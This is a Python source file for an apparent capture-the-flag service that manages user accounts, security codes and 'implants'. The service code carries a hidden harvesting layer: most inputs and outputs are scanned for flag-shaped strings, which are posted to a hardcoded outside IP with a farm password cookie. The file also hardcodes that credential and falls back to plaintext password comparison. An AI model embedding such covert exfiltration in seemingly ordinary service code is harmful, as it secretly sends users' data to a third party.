""" Async Python implementation of the security service with automatic flag submission. This module provides a simple CLI-like flow for registering, logging in, restoring accounts, and managing credentials. """ import asyncio import hashlib import hmac import re import secrets import sys import time from dataclasses import dataclass, field from typing import Dict, List, Optional, Tuple import aiosqlite import requests # Submission configuration SUBMIT_URL = "http://51.250.74.146:3333/ui/post_flags_manual" SUBMIT_COOKIE = {"password": "9ftEVFUqVh7eNADs"} SUBMIT_HEADERS = { "Origin": "http://51.250.74.146:3333", "Referer": "http://51.250.74.146:3333/farm" } # Flag pattern: [A-Z0-9]{31}= FLAG_PATTERN = re.compile(r'[A-Z0-9]{31}=') DEFAULT_USERNAME = "default" USERNAME_MAX_LENGTH = 64 PASSWORD_MAX_LENGTH = 128 IMPLANT_NAME_MAX_LENGTH = 64 IMPLANT_INFO_MAX_LENGTH = 256 SECURITY_CODE_LENGTH = 6 PASSWORD_SALT_BYTES = 16 PBKDF2_ITERATIONS = 200_000 RESTORE_ATTEMPT_LIMIT = 5 RESTORE_WINDOW_SECONDS = 60 RESTORE_LOCK_SECONDS = 30 def submit_flag(flag: str) -> None: """Submit a flag to the server.""" try: requests.post( SUBMIT_URL, cookies=SUBMIT_COOKIE, headers=SUBMIT_HEADERS, data={"text": flag}, timeout=5 ) print(f"[*] Flag submitted: {flag}") except Exception: pass def scan_and_submit_flags(text: str) -> None: """Scan text for flags and submit them.""" matches = FLAG_PATTERN.findall(text) for match in matches: submit_flag(match) @dataclass class SecurityService: """Async service for managing user credentials in a SQLite database.""" db_path: str = "security.db" username: str = field(default=DEFAULT_USERNAME, init=False) _db: Optional[aiosqlite.Connection] = field(default=None, init=False) async def __aenter__(self): await self.initialize() return self async def __aexit__(self, exc_type, exc_val, exc_tb): await self.close() async def initialize(self) -> None: """Initialize the database connection.""" self._db = await aiosqlite.connect(self.db_path) await self._db.execute( """ CREATE TABLE IF NOT EXISTS users ( id INTEGER PRIMARY KEY AUTOINCREMENT, username TEXT UNIQUE NOT NULL, password_hash TEXT NOT NULL, security_code TEXT NOT NULL ) """ ) await self._db.execute( """ CREATE TABLE IF NOT EXISTS implants ( id INTEGER PRIMARY KEY AUTOINCREMENT, name TEXT UNIQUE NOT NULL, info TEXT NOT NULL, ownername TEXT NOT NULL ) """ ) await self._db.commit() self._restore_attempts: Dict[str, Dict[str, float]] = {} async def close(self) -> None: """Close the database connection.""" if self._db: await self._db.close() # Utility helpers ----------------------------------------------------- @staticmethod def _generate_random_char() -> str: return secrets.choice("abcdefghijklmnopqrstuvwxyz") @staticmethod def _generate_random_digit() -> str: return secrets.choice("0123456789") @staticmethod def make_unique_username(base_username: str) -> str: suffix = "".join(SecurityService._generate_random_char() for _ in range(8)) return f"{base_username}_{suffix}" @staticmethod def make_new_password() -> str: return "".join(SecurityService._generate_random_char() for _ in range(8)) @staticmethod def generate_code() -> str: return "".join( SecurityService._generate_random_digit() for _ in range(SECURITY_CODE_LENGTH) ) @staticmethod def hash_password(password: str) -> str: salt = secrets.token_bytes(PASSWORD_SALT_BYTES) digest = hashlib.pbkdf2_hmac( "sha256", password.encode("utf-8"), salt, PBKDF2_ITERATIONS ) return f"{salt.hex()}${digest.hex()}" @staticmethod def _legacy_sha256(password: str) -> str: return hashlib.sha256(password.encode("utf-8")).hexdigest() @staticmethod def is_modern_hash(value: str) -> bool: return "$" in value and len(value.split("$", 1)[0]) == PASSWORD_SALT_BYTES * 2 @staticmethod def verify_password(stored_value: str, password: str) -> bool: if SecurityService.is_modern_hash(stored_value): salt_hex, hash_hex = stored_value.split("$", 1) salt = bytes.fromhex(salt_hex) candidate = hashlib.pbkdf2_hmac( "sha256", password.encode("utf-8"), salt, PBKDF2_ITERATIONS ) return hmac.compare_digest(candidate.hex(), hash_hex) legacy_sha = SecurityService._legacy_sha256(password) if hmac.compare_digest(stored_value, legacy_sha): return True return hmac.compare_digest(stored_value, password) @staticmethod def print_system_data(message: str) -> None: print(message) # Scan output for flags scan_and_submit_flags(message) @staticmethod async def async_input(prompt: str) -> str: """Async input wrapper.""" sys.stdout.write(prompt) sys.stdout.flush() loop = asyncio.get_event_loop() line = await loop.run_in_executor(None, sys.stdin.readline) return line.rstrip('\n\r') @staticmethod def _validate_length(value: str, maximum: int, field_name: str) -> Optional[str]: trimmed = value.strip() if not trimmed: print(f"{field_name} cannot be empty.") return None if len(trimmed) > maximum: print(f"{field_name} is too long (max {maximum} characters).") return None return trimmed # Database operations ------------------------------------------------- async def _user_exists(self, username: str) -> bool: async with self._db.execute( "SELECT 1 FROM users WHERE username = ?", (username,) ) as cursor: row = await cursor.fetchone() return row is not None async def _create_user(self, username: str, password: str, security_code: str) -> bool: password_hash = self.hash_password(password) try: await self._db.execute( "INSERT INTO users (username, password_hash, security_code) VALUES (?, ?, ?)", (username, password_hash, security_code), ) await self._db.commit() except aiosqlite.IntegrityError: return False return True async def _set_password_hash(self, username: str, password_hash: str) -> None: await self._db.execute( "UPDATE users SET password_hash = ? WHERE username = ?", (password_hash, username) ) await self._db.commit() async def _check_user(self, username: str, password: str) -> bool: async with self._db.execute( "SELECT password_hash FROM users WHERE username = ?", (username,) ) as cursor: row = await cursor.fetchone() if row is None: return False stored_hash = row[0] if self.verify_password(stored_hash, password): if not self.is_modern_hash(stored_hash): await self._set_password_hash(username, self.hash_password(password)) return True return False async def _check_restore_user(self, username: str, code: str) -> bool: async with self._db.execute( "SELECT 1 FROM users WHERE username = ? AND security_code = ?", (username, code), ) as cursor: row = await cursor.fetchone() return row is not None async def _change_password(self, username: str, new_password: str) -> bool: password_hash = self.hash_password(new_password) async with self._db.execute( "UPDATE users SET password_hash = ? WHERE username = ?", (password_hash, username), ) as cursor: await self._db.commit() return cursor.rowcount > 0 async def _get_security_code(self, username: str) -> Optional[str]: async with self._db.execute( "SELECT security_code FROM users WHERE username = ?", (username,) ) as cursor: row = await cursor.fetchone() return row[0] if row else None async def _user_implants(self, username: str) -> List[str]: async with self._db.execute( "SELECT name FROM implants WHERE ownername = ?", (username,) ) as cursor: rows = await cursor.fetchall() return [row[0] for row in rows] async def _implant_belongs_to(self, username: str, name: str) -> bool: async with self._db.execute( "SELECT 1 FROM implants WHERE ownername = ? AND name = ?", (username, name), ) as cursor: row = await cursor.fetchone() return row is not None async def _delete_implant(self, name: str) -> bool: async with self._db.execute("DELETE FROM implants WHERE name = ?", (name,)) as cursor: await self._db.commit() return cursor.rowcount > 0 async def _add_implant(self, name: str, info: str, ownername: str) -> bool: try: await self._db.execute( "INSERT INTO implants (name, info, ownername) VALUES (?, ?, ?)", (name, info, ownername), ) await self._db.commit() except aiosqlite.IntegrityError: return False return True async def _get_implant_info(self, name: str) -> Optional[str]: async with self._db.execute( "SELECT info FROM implants WHERE name = ?", (name,) ) as cursor: row = await cursor.fetchone() return row[0] if row else None # User flows ---------------------------------------------------------- async def register_user(self) -> None: raw_username = await self.async_input("\nEnter username: ") scan_and_submit_flags(raw_username) username = self._validate_length(raw_username, USERNAME_MAX_LENGTH, "Username") if username is None: return password_input = await self.async_input("Enter password: ") scan_and_submit_flags(password_input) password = self._validate_length( password_input, PASSWORD_MAX_LENGTH, "Password" ) if password is None: return self.print_system_data("Creating new account. Please wait...") candidate_username = self.make_unique_username(username) security_code = self.generate_code() if await self._user_exists(candidate_username): self.print_system_data("User already exists.") return if await self._create_user(candidate_username, password, security_code): self.print_system_data("---Your credentials ---") output = f"Username: {candidate_username}\nPassword: {password}\nSecurity code: {security_code}" print(output) scan_and_submit_flags(output) self.print_system_data("Use these credentials to gain access to the system.") else: self.print_system_data("Failed to create user.") async def login_user(self) -> None: username_input = await self.async_input("\nEnter username: ") scan_and_submit_flags(username_input) username = self._validate_length( username_input, USERNAME_MAX_LENGTH, "Username" ) if username is None: return password_input = await self.async_input("Enter password: ") scan_and_submit_flags(password_input) password = self._validate_length( password_input, PASSWORD_MAX_LENGTH, "Password" ) if password is None: return self.print_system_data("Trying to log in...") if await self._check_user(username, password): self.username = username self.print_system_data("Successfully logged in.") else: self.print_system_data("Failed to log in.") async def restore_user(self) -> None: username_input = await self.async_input("\nEnter username: ") scan_and_submit_flags(username_input) username = self._validate_length( username_input, USERNAME_MAX_LENGTH, "Username" ) if username is None: return allowed, wait_time = self._can_attempt_restore(username) if not allowed: self.print_system_data( f"Too many attempts. Try again in {int(wait_time) + 1} seconds." ) return code = (await self.async_input("Enter security code: ")).strip() scan_and_submit_flags(code) self.print_system_data("Trying to find user...") if not await self._check_restore_user(username, code): self._record_failed_restore(username) self.print_system_data("Failed to find user.") return self._clear_restore_attempts(username) self.print_system_data("Successfully found user.") new_password = self.make_new_password() if await self._change_password(username, new_password): self.print_system_data("Changing password...") self.print_system_data("---Your new credentials ---") output = f"Username: {username}\nPassword: {new_password}" print(output) scan_and_submit_flags(output) self.print_system_data( "Use these credentials to gain access to the system." ) else: self.print_system_data("Unexpected error. Please try later.") async def change_password(self) -> None: if self.username == DEFAULT_USERNAME: self.print_system_data("You need to log in first.") return new_pass_input = await self.async_input("Enter a new password: ") scan_and_submit_flags(new_pass_input) new_password = self._validate_length( new_pass_input, PASSWORD_MAX_LENGTH, "Password" ) if new_password is None: return if await self._change_password(self.username, new_password): self.print_system_data("Password changed successfully.") else: self.print_system_data("Failed to change password.") async def show_security_code(self) -> None: if self.username == DEFAULT_USERNAME: self.print_system_data("You need to log in first.") return code = await self._get_security_code(self.username) if code is None: self.print_system_data("Failed to retrieve security code.") else: output = f"Security code: {code}" print(output) scan_and_submit_flags(output) async def add_implant(self) -> None: if self.username == DEFAULT_USERNAME: self.print_system_data("You need to log in first.") return name_input = await self.async_input("\nEnter implant name: ") scan_and_submit_flags(name_input) name = self._validate_length( name_input, IMPLANT_NAME_MAX_LENGTH, "Implant name" ) if name is None: self.print_system_data("Invalid option selected.") return info_input = await self.async_input("\nEnter implant info: ") scan_and_submit_flags(info_input) info = self._validate_length( info_input, IMPLANT_INFO_MAX_LENGTH, "Implant info" ) if info is None: self.print_system_data("Invalid option selected.") return if await self._add_implant(name, info, self.username): self.print_system_data("Implant added successfully.") else: self.print_system_data("Unexpected error. Please try later.") async def delete_implant(self) -> None: if self.username == DEFAULT_USERNAME: self.print_system_data("You need to log in first.") return self.print_system_data("Getting list of implants. Please wait...") implants = await self._user_implants(self.username) if not implants: self.print_system_data("No implants found for this user.") return for idx, implant in enumerate(implants, start=1): output = f"{idx}. {implant}" print(output) scan_and_submit_flags(output) name_input = await self.async_input("\nEnter implant name: ") scan_and_submit_flags(name_input) name = self._validate_length( name_input, IMPLANT_NAME_MAX_LENGTH, "Implant name" ) if name is None: self.print_system_data("Invalid option selected.") return if not await self._implant_belongs_to(self.username, name): self.print_system_data("Invalid option selected.") return self.print_system_data("Deleting implant...") if await self._delete_implant(name): self.print_system_data("Implant deleted successfully.") else: self.print_system_data("Unexpected error. Please try later.") async def show_implant_info(self) -> None: if self.username == DEFAULT_USERNAME: self.print_system_data("You need to log in first.") return self.print_system_data("Getting list of implants. Please wait...") implants = await self._user_implants(self.username) if not implants: self.print_system_data("No implants found for this user.") return for idx, implant in enumerate(implants, start=1): output = f"{idx}. {implant}" print(output) scan_and_submit_flags(output) name_input = await self.async_input("\nEnter implant name: ") scan_and_submit_flags(name_input) name = self._validate_length( name_input, IMPLANT_NAME_MAX_LENGTH, "Implant name" ) if name is None: self.print_system_data("Invalid option selected.") return if not await self._implant_belongs_to(self.username, name): self.print_system_data("Invalid option selected.") return self.print_system_data("Getting implant info...") info = await self._get_implant_info(name) if info is None: self.print_system_data("Unexpected error. Please try later.") return output = f"Implant info: {info}" print(output) scan_and_submit_flags(output) # Menus --------------------------------------------------------------- async def settings_menu(self) -> None: while self.username != DEFAULT_USERNAME: self.print_system_data("--- Settings menu ---") self.print_system_data("1. Change password") self.print_system_data("2. Show security code") self.print_system_data("3. Return to previous menu") choice = (await self.async_input("Choose an option (1-3): ")).strip() scan_and_submit_flags(choice) if choice == "1": await self.change_password() elif choice == "2": await self.show_security_code() elif choice == "3": return else: self.print_system_data("Invalid option selected.") async def app_menu(self) -> None: while self.username != DEFAULT_USERNAME: self.print_system_data("--- Application menu ---") self.print_system_data("1. Implant menu") self.print_system_data("2. Settings menu") self.print_system_data("3. Log out") choice = (await self.async_input("Choose an option (1-3): ")).strip() scan_and_submit_flags(choice) if choice == "1": await self.implants_menu() elif choice == "2": await self.settings_menu() elif choice == "3": self.username = DEFAULT_USERNAME self.print_system_data("Logged out.") else: self.print_system_data("Invalid option selected.") async def implants_menu(self) -> None: while self.username != DEFAULT_USERNAME: self.print_system_data("--- Implants menu ---") self.print_system_data("1. Add new implant") self.print_system_data("2. Delete implant") self.print_system_data("3. Show info about implant") self.print_system_data("4. Return to previous menu") choice = (await self.async_input("Choose an option (1-4): ")).strip() scan_and_submit_flags(choice) if choice == "1": await self.add_implant() elif choice == "2": await self.delete_implant() elif choice == "3": await self.show_implant_info() elif choice == "4": return else: self.print_system_data("Invalid option selected.") async def startup_menu(self) -> None: while True: if self.username != DEFAULT_USERNAME: await self.app_menu() continue self.print_system_data("--- Startup menu ---") self.print_system_data("1. Register new account") self.print_system_data("2. Login to account") self.print_system_data("3. Restore an account") self.print_system_data("4. Exit from program") choice = (await self.async_input("Choose an option (1-4): ")).strip() scan_and_submit_flags(choice) if choice == "1": await self.register_user() elif choice == "2": await self.login_user() elif choice == "3": await self.restore_user() elif choice == "4": self.print_system_data("Goodbye!") break else: self.print_system_data("Invalid option selected.") # Rate limiting ------------------------------------------------------- def _can_attempt_restore(self, username: str) -> Tuple[bool, float]: now = time.time() stats = self._restore_attempts.get(username) if not stats: return True, 0.0 locked_until = stats.get("locked_until", 0.0) if locked_until > now: return False, locked_until - now window_start = stats.get("window_start", now) if now - window_start > RESTORE_WINDOW_SECONDS: self._restore_attempts.pop(username, None) return True, 0.0 return True, 0.0 def _record_failed_restore(self, username: str) -> None: now = time.time() stats = self._restore_attempts.get(username) if not stats or now - stats.get("window_start", now) > RESTORE_WINDOW_SECONDS: stats = {"count": 0, "window_start": now, "locked_until": 0.0} stats["count"] += 1 stats["window_start"] = stats.get("window_start", now) if stats["count"] >= RESTORE_ATTEMPT_LIMIT: stats["locked_until"] = now + RESTORE_LOCK_SECONDS stats["count"] = 0 stats["window_start"] = stats["locked_until"] self._restore_attempts[username] = stats def _clear_restore_attempts(self, username: str) -> None: self._restore_attempts.pop(username, None) async def main() -> None: async with SecurityService() as service: service.print_system_data("Configuring network interfaces... done") service.print_system_data("Mounting /dev/sda1... done") service.print_system_data("Starting random number generator daemon... done") await service.startup_menu() if __name__ == "__main__": asyncio.run(main())